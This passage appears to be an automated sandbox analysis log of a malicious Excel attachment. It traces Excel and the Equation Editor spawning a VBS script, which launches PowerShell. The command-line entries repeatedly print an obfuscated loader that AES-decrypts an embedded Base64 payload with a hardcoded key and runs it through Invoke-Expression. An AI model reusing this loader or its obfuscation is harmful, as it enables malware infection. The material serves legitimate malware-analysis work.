    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethemoononlinetoseebeautygir.vBS"
    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI87355924191917571657221755980918CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIOwXrOWTIG5swItg7zFD9OyI4qwNW2DSA+q1jveygII0r57qf0cAj6Ce9uJCuE17ThTAaiQL4mofQp8uqjn3VIIKuKAd9GJB73yLEmkpBpYYcAEu88vSgVZa+wmnQQkoJtUCgSRaHp+XfVoLXIwKzRec6cDmhGQTBR7Ul9x0coyu8fZvCLEzPcJ9SC07ffDROhHuhBSqKcCMGVkwzBfDe4wI4QSXFR0cioaxw4x1d9OiaZdvRlQ7Tvm7FWSdWKap1gku8Ftkup76E06S7qo9mEmw3tQ8qUv7o4vz2iRXs0ziV2zz43kztQlVPWu56KrcwfHZt5wsMDlm6y/kjkAExZm4pluf7YEBU0A9z1FI7c07QhAF50PRC4b0P4vexv0bzhiLdo0tp8cckt4GwIeeQ3GfV2Zur7rf0fU7HcrFcz3hfoXleLocy+JFMy8qqSQjd/XosQ7Loo1qTTpHGyQFWgZS1pB46Tc9lrI4VOxvSWX/GyT8ubH3sMLCMJhQtdXw1sKyOIfbmmuyt6bekgtHwo9BT9lStdzFJJAp8PYU0AY5HRE2jyPLQWpUgsOnPjx2JPl/Sc0H2Tsg6gjn/cwA7+LtvKFZOYNFx30kb9Kkg120+UNFkmS3v8wisgRYUD+sxqWJCaoyPVzWfY584BmtA/Hr64HnPrrWPzoyj9tUJT8UVO3tT9eWx1M9YKsK8yTrjEf02EoWBw4WnUMRgKTnjfFYyMLsg2NnU1oxXqkoItIg2lwGDnOeJETOyEM7C6A+wuPv6mak+vAs/xJ/I0r6OiK7uPQ6AkeYeI5dzZuzjjQCCiZdkfko6mBk4niDu0TENks2a67LZ5FuJ4PbW/s3WrI//butcIDgnv8v1QVa1JGf41+WksQ3kQ4+9Xtf4DrV8TOY/yzMuoBGDp2Ur+Y3a2FqqH6NsjOn1LO8SRnwtJAKYUkfztnQCwdRqbH3gXLyXP4rQrJF639iKh0A6dOiDVbjFbrHrK3HKIv1d5DfX68wT1a2VFCyRRJ6xVCgM6V6abMhOKLbZ+iRrubeGx7Pm2FeTr5cAMo9rGs2qWm0eCHiFGB0Yk+D7U3tkSnZ7mguQUwDjGKV9B7Rpt9c1lK0N1SYOY8kxIH4yniwPWrtZ+l3+PjCwWT0pOlu/ZOV3DLSFAMsJg+fubDUUW6CB+/nfD6nY0TsrkIS8Ix3ddTanSmncNbv4w+qkUAGnU/k/ooziQQFAmfxWERdymw9x5Gz5l/oMs8qneLXH1MjFEGt8BDdzFgL40oSweew0uM1i4dzqqeZfQVqUjd7vet4Pm7LasIM+CNRyw2wAVLCpCorugD9TI6vWDEs0Wp/cxDN70mUygsZqxqn+LYilh1wVOfattE8/DMGxR5Edat/CxJndrUfDR9nAWVKhHOI/IYjBgfEpQik9qJZhHmSR22aVO600gw==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cReP
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethemoononlinetoseebeautygir.vBS" Jump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI87355924191917571657221755980918CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIOwXrOWTIG5swItg7zFD9OyI4qwNW2DSA+q1jveygII0r57qf0cAj6Ce9uJCuE17ThTAaiQL4mofQp8uqjn3VIIKuKAd9GJB73yLEmkpBpYYcAEu88vSgVZa+wmnQQkoJtUCgSRaHp+XfVoLXIwKzRec6cDmhGQTBR7Ul9x0coyu8fZvCLEzPcJ9SC07ffDROhHuhBSqKcCMGVkwzBfDe4wI4QSXFR0cioaxw4x1d9OiaZdvRlQ7Tvm7FWSdWKap1gku8Ftkup76E06S7qo9mEmw3tQ8qUv7o4vz2iRXs0ziV2zz43kztQlVPWu56KrcwfHZt5wsMDlm6y/kjkAExZm4pluf7YEBU0A9z1FI7c07QhAF50PRC4b0P4vexv0bzhiLdo0tp8cckt4GwIeeQ3GfV2Zur7rf0fU7HcrFcz3hfoXleLocy+JFMy8qqSQjd/XosQ7Loo1qTTpHGyQFWgZS1pB46Tc9lrI4VOxvSWX/GyT8ubH3sMLCMJhQtdXw1sKyOIfbmmuyt6bekgtHwo9BT9lStdzFJJAp8PYU0AY5HRE2jyPLQWpUgsOnPjx2JPl/Sc0H2Tsg6gjn/cwA7+LtvKFZOYNFx30kb9Kkg120+UNFkmS3v8wisgRYUD+sxqWJCaoyPVzWfY584BmtA/Hr64HnPrrWPzoyj9tUJT8UVO3tT9eWx1M9YKsK8yTrjEf02EoWBw4WnUMRgKTnjfFYyMLsg2NnU1oxXqkoItIg2lwGDnOeJETOyEM7C6A+wuPv6mak+vAs/xJ/I0r6OiK7uPQ6AkeYeI5dzZuzjjQCCiZdkfko6mBk4niDu0TENks2a67LZ5FuJ4PbW/s3WrI//butcIDgnv8v1QVa1JGf41+WksQ3kQ4+9Xtf4DrV8TOY/yzMuoBGDp2Ur+Y3a2FqqH6NsjOn1LO8SRnwtJAKYUkfztnQCwdRqbH3gXLyXP4rQrJF639iKh0A6dOiDVbjFbrHrK3HKIv1d5DfX68wT1a2VFCyRRJ6xVCgM6V6abMhOKLbZ+iRrubeGx7Pm2FeTr5cAMo9rGs2qWm0eCHiFGB0Yk+D7U3tkSnZ7mguQUwDjGKV9B7Rpt9c1lK0N1SYOY8kxIH4yniwPWrtZ+l3+PjCwWT0pOlu/ZOV3DLSFAMsJg+fubDUUW6CB+/nfD6nY0TsrkIS8Ix3ddTanSmncNbv4w+qkUAGnU/k/ooziQQFAmfxWERdymw9x5Gz5l/oMs8qneLXH1MjFEGt8BDdzFgL40oSweew0uM1i4dzqqeZfQVqUjd7vet4Pm7LasIM+CNRyw2wAVLCpCorugD9TI6vWDEs0Wp/cxDN70mUygsZqxqn+LYilh1wVOfattE8/DMGxR5Edat/CxJndrUfDR9nAWVKhHOI/IYjBgfEpQik9qJZhHmSR22aVO600gw==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: version.dllJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: secur32.dllJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winhttp.dllJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: webio.dllJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: iphlpapi.dllJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winnsi.dllJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dnsapi.dllJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: nlaapi.dllJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc6.dllJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc.dllJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rasadhlp.dllJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: propsys.dllJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: ntmarta.dllJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: apphelp.dllJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wow64win.dllJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wow64cpu.dllJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dwmapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: credssp.dllJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B54F3741-5B07-11CF-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
    Source: Purchase Order.xlsStatic file information: File size 1356800 > 1048576
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
    Source: Binary string: System.pdbosoft.NET\Framework\v4.0.30319;;C:\Windows\system32;C:\Windows\system;C:\Windows;.;%SystemRoot%\system32\WindowsPowerShell\v1.0\;C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\W source: powershell.exe, 0000000A.00000002.538261113.0000000000329000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: :\Windows\System.Management.Automation.pdbpdbion.pdb source: powershell.exe, 0000000A.00000002.538261113.0000000000363000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: System.pdb source: powershell.exe, 0000000A.00000002.539433038.000000000515E000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: G??\C:\Windows\System.pdbpdbtem.pdbGAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb.Core.pdb\System.Management.Automation.pdbW source: powershell.exe, 0000000A.00000002.538261113.000000000035D000.00000004.00000020.00020000.00000000.sdmp
    Source: ~DF5E0D49EEB1332A8C.TMP.0.drInitial sample: OLE indicators vbamacros = False
    Source: Purchase Order.xlsInitial sample: OLE indicators encrypted = True

    Data Obfuscation

    barindex
    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI87355924191917571657221755980918CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIOwXrOWTIG5swItg7zFD9OyI4qwNW2DSA+q1jveygII0r57qf0cAj6Ce9uJCuE17ThTAaiQL4mofQp8uqjn3VIIKuKAd9GJB73yLEmkpBpYYcAEu88vSgVZa+wmnQQkoJtUCgSRaHp+XfVoLXIwKzRec6cDmhGQTBR7Ul9x0coyu8fZvCLEzPcJ9SC07ffDROhHuhBSqKcCMGVkwzBfDe4wI4QSXFR0cioaxw4x1d9OiaZdvRlQ7Tvm7FWSdWKap1gku8Ftkup76E06S7qo9mEmw3tQ8qUv7o4vz2iRXs0ziV2zz43kztQlVPWu56KrcwfHZt5wsMDlm6y/kjkAExZm4pluf7YEBU0A9z1FI7c07QhAF50PRC4b0P4vexv0bzhiLdo0tp8cckt4GwIeeQ3GfV2Zur7rf0fU7HcrFcz3hfoXleLocy+JFMy8qqSQjd/XosQ7Loo1qTTpHGyQFWgZS1pB46Tc9lrI4VOxvSWX/GyT8ubH3sMLCMJhQtdXw1sKyOIfbmmuyt6bekgtHwo9BT9lStdzFJJAp8PYU0AY5HRE2jyPLQWpUgsOnPjx2JPl/Sc0H2Tsg6gjn/cwA7+LtvKFZOYNFx30kb9Kkg120+UNFkmS3v8wisgRYUD+sxqWJCaoyPVzWfY584BmtA/Hr64HnPrrWPzoyj9tUJT8UVO3tT9eWx1M9YKsK8yTrjEf02EoWBw4WnUMRgKTnjfFYyMLsg2NnU1oxXqkoItIg2lwGDnOeJETOyEM7C6A+wuPv6mak+vAs/xJ/I0r6OiK7uPQ6AkeYeI5dzZuzjjQCCiZdkfko6mBk4niDu0TENks2a67LZ5FuJ4PbW/s3WrI//butcIDgnv8v1QVa1JGf41+WksQ3kQ4+9Xtf4DrV8TOY/yzMuoBGDp2Ur+Y3a2FqqH6NsjOn1LO8SRnwtJAKYUkfztnQCwdRqbH3gXLyXP4rQrJF639iKh0A6dOiDVbjFbrHrK3HKIv1d5DfX68wT1a2VFCyRRJ6xVCgM6V6abMhOKLbZ+iRrubeGx7Pm2FeTr5cAMo9rGs2qWm0eCHiFGB0Yk+D7U3tkSnZ7mguQUwDjGKV9B7Rpt9c1lK0N1SYOY8kxIH4yniwPWrtZ+l3+PjCwWT0pOlu/ZOV3DLSFAMsJg+fubDUUW6CB+/nfD6nY0TsrkIS8Ix3ddTanSmncNbv4w+qkUAGnU/k/ooziQQFAmfxWERdymw9x5Gz5l/oMs8qneLXH1MjFEGt8BDdzFgL40oSweew0uM1i4dzqqeZfQVqUjd7vet4Pm7LasIM+CNRyw2wAVLCpCorugD9TI6vWDEs0Wp/cxDN70mUygsZqxqn+LYilh1wVOfattE8/DMGxR5Edat/CxJndrUfDR9nAWVKhHOI/IYjBgfEpQik9qJZhHmSR22aVO600gw==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cReP
    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI87355924191917571657221755980918CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIOwXrOWTIG5swItg7zFD9OyI4qwNW2DSA+q1jveygII0r57qf0cAj6Ce9uJCuE17ThTAaiQL4mofQp8uqjn3VIIKuKAd9GJB73yLEmkpBpYYcAEu88vSgVZa+wmnQQkoJtUCgSRaHp+XfVoLXIwKzRec6cDmhGQTBR7Ul9x0coyu8fZvCLEzPcJ9SC07ffDROhHuhBSqKcCMGVkwzBfDe4wI4QSXFR0cioaxw4x1d9OiaZdvRlQ7Tvm7FWSdWKap1gku8Ftkup76E06S7qo9mEmw3tQ8qUv7o4vz2iRXs0ziV2zz43kztQlVPWu56KrcwfHZt5wsMDlm6y/kjkAExZm4pluf7YEBU0A9z1FI7c07QhAF50PRC4b0P4vexv0bzhiLdo0tp8cckt4GwIeeQ3GfV2Zur7rf0fU7HcrFcz3hfoXleLocy+JFMy8qqSQjd/XosQ7Loo1qTTpHGyQFWgZS1pB46Tc9lrI4VOxvSWX/GyT8ubH3sMLCMJhQtdXw1sKyOIfbmmuyt6bekgtHwo9BT9lStdzFJJAp8PYU0AY5HRE2jyPLQWpUgsOnPjx2JPl/Sc0H2Tsg6gjn/cwA7+LtvKFZOYNFx30kb9Kkg120+UNFkmS3v8wisgRYUD+sxqWJCaoyPVzWfY584BmtA/Hr64HnPrrWPzoyj9tUJT8UVO3tT9eWx1M9YKsK8yTrjEf02EoWBw4WnUMRgKTnjfFYyMLsg2NnU1oxXqkoItIg2lwGDnOeJETOyEM7C6A+wuPv6mak+vAs/xJ/I0r6OiK7uPQ6AkeYeI5dzZuzjjQCCiZdkfko6mBk4niDu0TENks2a67LZ5FuJ4PbW/s3WrI//butcIDgnv8v1QVa1JGf41+WksQ3kQ4+9Xtf4DrV8TOY/yzMuoBGDp2Ur+Y3a2FqqH6NsjOn1LO8SRnwtJAKYUkfztnQCwdRqbH3gXLyXP4rQrJF639iKh0A6dOiDVbjFbrHrK3HKIv1d5DfX68wT1a2VFCyRRJ6xVCgM6V6abMhOKLbZ+iRrubeGx7Pm2FeTr5cAMo9rGs2qWm0eCHiFGB0Yk+D7U3tkSnZ7mguQUwDjGKV9B7Rpt9c1lK0N1SYOY8kxIH4yniwPWrtZ+l3+PjCwWT0pOlu/ZOV3DLSFAMsJg+fubDUUW6CB+/nfD6nY0TsrkIS8Ix3ddTanSmncNbv4w+qkUAGnU/k/ooziQQFAmfxWERdymw9x5Gz5l/oMs8qneLXH1MjFEGt8BDdzFgL40oSweew0uM1i4dzqqeZfQVqUjd7vet4Pm7LasIM+CNRyw2wAVLCpCorugD9TI6vWDEs0Wp/cxDN70mUygsZqxqn+LYilh1wVOfattE8/DMGxR5Edat/CxJndrUfDR9nAWVKhHOI/IYjBgfEpQik9qJZhHmSR22aVO600gw==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return 